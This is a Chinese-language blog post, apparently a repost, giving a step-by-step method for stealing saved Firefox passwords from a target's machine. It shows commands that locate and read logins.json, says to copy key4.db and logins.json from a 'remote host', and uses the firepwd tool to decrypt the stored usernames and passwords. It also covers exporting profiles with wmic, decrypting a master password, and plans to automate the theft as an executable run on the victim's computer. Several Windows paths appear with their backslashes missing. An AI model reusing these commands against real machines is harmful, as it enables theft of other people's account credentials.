Firefox 密码脱取
Posted 0xdd
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Firefox 密码脱取相关的知识,希望对你有一定的参考价值。
Firefox 密码脱取
正常获取
访问 about:logins
配置文件获取
信息:
- Website address
- Username
- Password
- Created
- Last modified
- Last used
保存位置
%APPDATA%MozillaFirefoxProfilesxxxxxxxx.default #xxxxxxxx 为随机字母和数字的组合
logins.json文件
dir %APPDATA%MozillaFirefoxProfiles*logins.json /s /b
查看内容
type C:UsersxAppDataRoamingMozillaFirefoxProfilesxx.default-releaselogins.json
可以查看到,所记录的URL,用户名,加密后的密码。创建时间等信息。
工具:firepwd
https://github.com/lclevy/firepwd
python3 -m pip install -r requirements.txt ##安装 PyCryptodome>=3.9.0 pyasn1>=0.4.8
下载远程主机的 C:UsersxAppDataRoamingMozillaFirefoxProfilesxx.default-release 目录下的
- key4.db
- logins.json
本地执行
python firepwd.py -d new_db
获取到账号密码。
Firefox 配置文件导出
wmic process where name=‘firefox.exe‘ get executablepath,processid ##查看火狐浏览器位置
firefox.exe -profile C:Windows empdata1 #启动firefox 并导出
会将Firefox 配置文件导入到指定目录。
未踩的坑
Master Password # 用户手工加了个面膜 (暂时没有遇到目标自己去做这件事,就先不研究了)
如有遇到,解密,用上面的脚本 加-p 参数 输入Master Password的密码 即可,
Todo
1.如果可以在对方机器执行EXE,自己打包python脚本 进行自动化或许
2.或者用go自己写一个..
以上是关于Firefox 密码脱取的主要内容,如果未能解决你的问题,请参考以下文章
Selenium 使用 Python:输入/提供 Firefox 的 http 代理密码
每日安全资讯研究人员发现 Firefox 的主密码系统不安全
修改MySQL密码报错“ERROR 1819 (HY000): Your password does not satisfy the current policy requirements“(代码片段